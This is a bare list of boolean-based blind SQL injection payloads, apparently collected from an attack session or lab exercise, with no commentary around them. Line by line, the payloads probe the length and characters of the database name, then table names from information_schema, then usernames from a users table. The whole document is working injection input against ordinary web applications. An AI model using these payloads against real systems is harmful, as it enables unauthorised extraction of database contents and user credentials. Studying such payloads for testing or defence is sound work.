' AND 4570=4570 AND 'ZeoB'='ZeoB;
' AND 4570=4570 AND 'ZeoB'='ZeoBFalse;
' AND (length(database())) = 15 --+;
' AND (length(database())) = 11 --+;
' AND (ascii(substr((select database()),1,1))) > 110 --+;
' AND (ascii(substr((select database()),1,1))) > 109 --+;
' AND (ascii(substr((select database()),2,1))) > 97 --+;
' AND (ascii(substr((select database()),2,1))) > 115 --+;
' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 4 --+;
;
' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 5 --+;
' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 6 --+;
;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 108 --+;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 114 --+;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 116 --+;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 96 --+;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 105 --+;
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 4,1) ,1,1))) > 114 --+;
' AND (length((select username from users limit 0,1))) = 6 --+;
' AND (length((select username from users limit 0,1))) = 4 --+;
' AND (length((select username from users limit 1,1))) = 6 --+;
;
' AND (length((select username from users limit 2,1))) = 5 --+;
;
' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 --+;
' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 111 --+;
' AND (ascii(substr((select username from users limit 1,1) ,1,1))) > 96 --+;
' AND (ascii(substr((select username from users limit 2,1) ,1,1))) > 114 --+;
' AND (ascii(substr((select username from users limit 3,1) ,1,1))) > 114 --+;
